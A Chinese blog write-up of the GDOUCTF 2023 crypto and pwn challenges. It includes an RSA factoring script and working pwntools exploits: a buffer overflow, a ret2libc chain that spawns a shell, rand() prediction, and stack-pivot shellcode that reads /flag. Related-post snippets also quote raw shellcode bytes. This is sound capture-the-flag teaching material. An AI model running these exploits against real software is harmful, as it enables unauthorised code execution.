GDOUCTF2023 Crypto Pwn

已于 2024-03-03 11:51:42 修改
阅读量524 收藏 4
点赞数 1
文章标签: python
于 2023-04-16 20:07:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41626232/article/details/130186797
版权

目录

Crypto

Absolute_Baby_Encrytpion

babylua

Magic of Encoding

Math Problem

Pwn

EASY PWN

Shellcode

真男人下120层

Random

Crypto

Absolute_Baby_Encrytpion

单表替换,略

babylua

四位大小写爆破,略

Magic of Encoding

这不是misc题吗???

base64解密看见一大堆fake flag;

 看见PK压缩包格式了,多半要想一想怎么弄成压缩包。

我直接把fake的base64密文全删了,然后就给了一个压缩包出来了

# -*- coding utf-8 -*-
# @Time : 2023/4/16 12:17
f=open('Magic_Of_Encoding.txt','rb').read()
import base64
ff=open('1.zip','wb')
print(f.replace(b'ZmxhZ3tYZF9mYWtlX2ZsYWdfeER9',b'').replace(b'ZmluZF9tZV9pZl95b3VfY2Fu',b'').replace(b'ZmxhZ3tub3RfdGhlX2NvcnJlY3Rf',b'').replace(b'ZmxhZ19sb2x9',b'').replace(b'CmZsYWd7bm90X3RoZV9jb3JyZWN0X2ZsYWdfbG9sfQpmbGFne25vdF90aGVfY29ycmVjdF9mbGFnX2xvbH0K',b''))
res=b'UEsDBBQACAAIAAZUilYAAAAAAAAAACUAAAAVACAATWFnaWMgb2YgRW5jb2RpbmcudHh0VVQNAAdNkTNkTpEzZE2RM2R1eAsAAQT1AQAABBQAAABLy0lMr84wKDCOrzQojc/JzDZOiS/JSI33NUnPTI43L8pMzq7lAgBQSwcIjmX6WicAAAAlAAAAUEsBAhQDFAAIAAgABlSKVo5l+lonAAAAJQAAABUAIAAAAAAAAAAAAKSBAAAAAE1hZ2ljIG9mIEVuY29kaW5nLnR4dFVUDQAHTZEzZE6RM2RNkTNkdXgLAAEE9QEAAAQUAAAAUEsFBgAAAAABAAEAYwAAAIoAAAAAAA=='
ff.write(base64.b64decode(res))
ff.close()

然后打开1.zip压缩包得到flag

Math Problem

给出域为p的椭圆曲线,和其上一点的纵坐标。x是64小bits数。考虑在多项式环n求解x

使用(small_roots)方法

平时这种都是比较大的数求解,我这个太久没注意到epsilon这个参数了

SageMath中small_roots方法的epsilon参数的默认值为0.05,该默认参数下的bound不足以解出本题的小整数解,根据1/2 * N^(beta^2 // delta - epsilon)我们可以直接调整epsilon的值为0.01

比赛用的蠢方法做的,发现x为52位时可以使用small_roots,(这个很好找到上界,没考虑epsilon参数)然后简单爆破2^12=4096解空间

from tqdm import *
# x,y=G.xy()
# x,y=ZZ(x),ZZ(y)
# -x**3-a*x-b+y^2,(-x**3-a*x-b+y^2) %n,p,x
e = 65537
n = 79239019133008902130006198964639844798771408211660544649405418249108104979283858140199725213927656792578582828912684320882248828512464244641351915288069266378046829511827542801945752252863425605946379775869602719406340271702260307900825314967696531175183205977973427572862807386846990514994510850414958255877
c = 45457869965165575324534408050513326739799864850578881475341543330291990558135968254698676312246850389922318827771380881195754151389802803398367341521544667542828862543407738361578535730524976113729406101764290984943061582342991118766322793847422471903811686775249409300301726906738475446634950949059180072008
a = 9303981927028382051386918702900550228062240363697933771286553052631411452412621158116514735706670764224584958899184294505751247393129887316131576567242619
b = 9007779281398842447745292673398186664639261529076471011805234554666556577498532370235883716552696783469143334088312327338274844469338982242193952226631913
y = 970090448249525757357772770885678889252473675418473052487452323704761315577270362842929142427322075233537587085124672615901229826477368779145818623466854

PR.<x> = PolynomialRing(Zmod(n))
for i in tqdm(range(2148,4096)):
    f=(x+(i<<52))^3+a*(x+(i<<52))+b-y^2
    f=f.monic()
    if f.small_roots(X=2^52,beta=0.44):
        print(i)
        print(f.small_roots(X=2^52,beta=0.44))
        break
p=gcd(ZZ(f(2661801545956375)),n)
q=n//p
d=inverse(e,(p-1)*(q-1))
long_to_bytes(ZZ(pow(c,d,n)))

打新生赛成小丑了

Pwn

EASY PWN

 开启PIE

  fd = open("/dev/urandom", 0);
  if ( fd < 0 )
  {
    puts("Can't access /dev/urandom.");
    exit(1);
  }
  v3 = read(fd, buf, 0xAuLL);
  if ( v3 < 0 )
  {
    puts("Data not received from /dev/urandom");
    exit(1);
  }
  close(fd);
  puts("Password:");
  gets(s1);
  result = strcmp(s1, buf);
  if ( result )
    result = puts("I swore that was the right password ...");
  else
    v5 = 1;
  if ( v5 )
  {
    puts("Guess I couldn't gaslight you!");
    result = print_flag();
  }
  return result;
}

gets溢出到返回地址,然后覆盖后2字节为print_flag函数地址

exp

from pwn import *

p=process('./easypwn')
p=remote('node6.anna.nssctf.cn',28850)
elf=ELF('./easypwn')
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
p.recvuntil(b':\n')

payload=b'a'*0x1f+p64(0)+p16(0x11d5)
p.send(payload)
p.interactive()

Shellcode

没啥说的,短点的shellcode就行

我做的时候忘记看题目名字了,溢出大小还行,用常规的ret2libc做的

from pwn import *
from LibcSearcher import *
p=process('./p1')
#p=remote('node5.anna.nssctf.cn',28961)
context.arch='amd64'
#context.log_level='debug'
lea=0x000000000040074e
rdi=0x00000000004007b3
ret=0x000000000040028e
elf=ELF('./p1')
def get_addr():
    return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
context(log_level = 'debug', arch = 'amd64', os = 'linux')
p.recv()
p.send(b'1')
p.recvuntil(b"Let's start!\n")
p.sendline(b'a'*10+p64(0)+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(elf.sym['main']))
puts_addr=get_addr()
libc=LibcSearcher('puts',puts_addr)

libc_base=puts_addr-libc.dump('puts')
log.success(hex(libc_base))
system=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump('str_bin_sh')
log.success(hex(system))
log.success(hex(bin_sh))
#gdb.attach(p)
p.recv()
p.send(b'a')
p.recvuntil(b"Let's start!\n")
p.sendline(b'a'*10+p64(0)+p64(ret)+p64(rdi)+p64(bin_sh)+p64(system))
p.interactive()

真男人下120层

这个用ctypes库加载libc文件,然后随机数就一模一样了,没见过的话,可以看一看,感觉很好用


from pwn import *
from ctypes import *


p=process('./bin')
p=remote('node6.anna.nssctf.cn',28283)
libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')

libc.srand(libc.time(0))


v4=libc.rand()% 3 - 1522127470
libc.srand(v4)

for i in range(120):
    t=libc.rand() %4+1
    p.sendline(str(t).encode())
p.interactive()

Random

远程没通

随机数预测+栈迁移到shellcode

感觉跟 [极客大挑战 2019]Not Bad 一样。

from pwn import *
from ctypes import *
context.arch='amd64'
context.log_level='debug'

elf = ELF('./p4')
#p = remote('node3.buuoj.cn',28461)
p=process('./p4')

jmp = 0x000000000040094e

bss = 0x601200
orw_payload = shellcraft.open("/flag")
orw_payload += shellcraft.read(3, bss, 0x50)
orw_payload += shellcraft.write(1, bss,0x50)
libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
libc.srand(libc.time(0))
def RANDOM():
    p.recvuntil(b':\n')
    p.sendline(str(libc.rand()% 50).encode())
    p.recvuntil(b'door\n')
RANDOM()

payload=asm(shellcraft.read(0,bss,0x100))+asm('mov rax,0x601200;call rax')
payload=payload.ljust(0x28,b'\x00')
payload+=p64(jmp)+asm('sub rsp,0x30;jmp rsp')


shellcode=asm(orw_payload)

p.sendline(shellcode)

p.interactive()

看见别人直接把bss用rsp来替代,都不用在call一下就行。又学到一点

from pwn import *
from ctypes import *
context.arch='amd64'
context.log_level='debug'

elf = ELF('./p4')
#p = remote('node3.buuoj.cn',28461)
p=process('./p4')

bss=0x600100
orw_payload = shellcraft.open("/flag")
orw_payload += shellcraft.read(3, 'rsp', 0x50)
orw_payload += shellcraft.write(1, 'rsp',0x50)
libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
libc.srand(libc.time(0))
def RANDOM():
    p.recvuntil(b':\n')
    p.sendline(str(libc.rand()% 50).encode())
    p.recvuntil(b'door\n')
RANDOM()
jmp_rsp=0x000000000040094e
payload=asm(shellcraft.read(0,'rsp',0x50))
payload=payload.ljust(0x28,b'\x00')
payload+=p64(jmp_rsp)+asm('sub rsp,0x30;jmp rsp')

p.send(payload)

shellcode=asm(orw_payload)
p.sendline(b'a'*0xc+shellcode)
p.interactive()

无趣的浅
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF-PWN学习-为缺少指导的同学而生_ctf pwn(1)
m0_61330806的博客
04-07 588
这个页面按下F5,反汇编为伪代码看到关键函数system()点进去看一下,是不是我们要的那种。双击那个system(a)好极了,就是这个。再来看一下变量command是如何传进去的,左上角箭头,回到历史记录再分析一下程序,用户的输入被存到了变量a中,a经过fun函数后,传入system函数执行,也就是说,command就是a,也就是用户的输入。再双击fun看一下,有没有特殊处理经典的字符串倒置代码,也就是说,它会把你的输入倒过来,即ls->sl ,cat flag->galf tac。
SEKAICTF2023 Crypto题目合集
08-29
SEKAICTF2023 Crypto题目合集是网络安全领域中的一个加密挑战赛,它旨在测试和提升参赛者的密码学知识和技能。在这一合集中,我们可能会遇到一系列与密码学相关的难题,涵盖对称加密、非对称加密、哈希函数、数字...
GDOUCTF2023-misc方向WP
toto的博客
04-16 1978
有问题或交流可联系Q:2282679004。
2023第三届红明谷CTF Crypto
qq_41626232的博客
04-19 1592
只有一个密码题,当场退役。
[GDOUCTF 2023] ——web方向全Write up
Leaf_initial的博客
04-17 2135
魔术方法,然后可以看到__wakeup()中会指向classroom类的hahaha函数,hahaha所需要的变量条件在school类的。把`’ [] " _ {{}} \ .都过滤了但是比较幸运的是可以用{%%},看了看他的config和self,发现都可以用。test.txt也看过了,里面和/orzorz.php中的内容一样,不过是文档形式,这里不赘述。可以看出这个通过flask框架写的一个网页,通过代码审计我们可以得知,只需要向。所以,双等号是不要求类型相同的,所以我们可以构造payload。
GDOUCTF2023 Reverse题解
OrientalGlass的博客
04-17 5837
ida分析之后会出现几个新的窗口,最关键的是这个Matched Functions窗口,绿色代表匹配一致,往下翻在最后可以发现。反汇编窗口往下翻可以看到关键函数,这个循环的基本功能应该是对lmao数组的数据进行异或,但并不容易的值用于异或的中间值是什么。然后打开ls-patched.i64文件,选择Edit>Plugins>BinDiff,进来找不到关键函数,查看strings看到类似迷宫的东西,根据字符串可以定位到关键函数。安装时注意路径即可,默认在C盘,可以自己修改,他会自动绑定IDA的路径。
2023 GDOUCTF --- Crypto wp
3tefanie丶zhou的博客
04-17 836
【一个人,哪能什么都不麻烦别人,偶尔有个一两次,不用太愧疚。】
IIS Crypto 3.2 下载
07-26
IIS Crypto 是一个免费工具,让管理员能够在 Windows Server 2008、2012、2016 和 2019 上启用或禁用协议、密码、哈希和密钥交换算法。一键禁用不安全的 SSL 3、TLS 1.0,开启TLS 1.2、TLS 1.3 非常方便
【CTF-Crypto实战-2023红队】Babystack
07-28
Babystack
IISCrypto3.2.zip
11-19
IIS Crypto是一款免费工具,使管理员能够在Windows Server 2008,2012和2016上启用或禁用协议,密码,哈希和密钥交换算法;它还允许您对IIS提供的SSL / TLS密码套件进行重新排序,实施最佳做法只需点击一下,创建...
crypto-js.zip
09-10
《深入理解AES加密与Crypto-js库在JavaScript中的应用》 AES(Advanced Encryption Standard),即高级加密标准,是一种广泛应用于网络安全的块密码算法。它基于Rijndael算法,以其高效性和安全性著称,被用于数据...
[irisctf 2023] pwn部分
weixin_52640415的博客
01-09 736
irisctf 2023 pwn 两题
[GDOUCTF 2023]Shellcode
最新发布
m0_74355719的博客
11-29 403
64 位 较短的 shellcode 23 字节 \x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f \x05。短字节 shellcode -> 21 字节 \x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80。
GDOUCTF2023 Writeup
S4n_v1的博客
04-16 1433
钝角
[GDOUCTF 2023]Shellcode 全网最详细write up
qq_41937545的博客
11-02 519
64 位 较短的 shellcode -> 23 字节 \x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f \x05】​。32 位 短字节 shellcode -> 21 字节 \x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80。并且没有后门没有system。
[GDOUCTF 2023] crypto pwn 部分
weixin_52640415的博客
04-17 828
GDOUCTF 2023 crypto,pwn
[GDOUCTF2023] Random
JusticeUphold的博客
04-17 207
[GDOUCTF2023] Random,设计到知识点有伪随机,汇编,ORWshellcode,栈地址泄露
GDOUCTF web部分题解 2023
Jay17的博客
04-16 1915
GDOUCTF web部分题解 2023 (已加上NSS另外两题)
全栈/Web/Misc/Crypto/Pwn/Re/IoT
11-04
全栈是指掌握多种技能的人,能够独立完成一个完整的项目。Web是指基于Web的应用程序,包括前端和后端。Misc是指杂项,包括各种不同类型的题目,如图片隐写、二进制分析等。Crypto是指密码学,包括加密、解密、签名等。Pwn是指利用漏洞攻击程序,获取程序的控制权。Re是指逆向工程,包括反汇编、调试等。IoT是指物联网,包括各种智能设备和传感器。这些都是CTF比赛中常见的方向。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值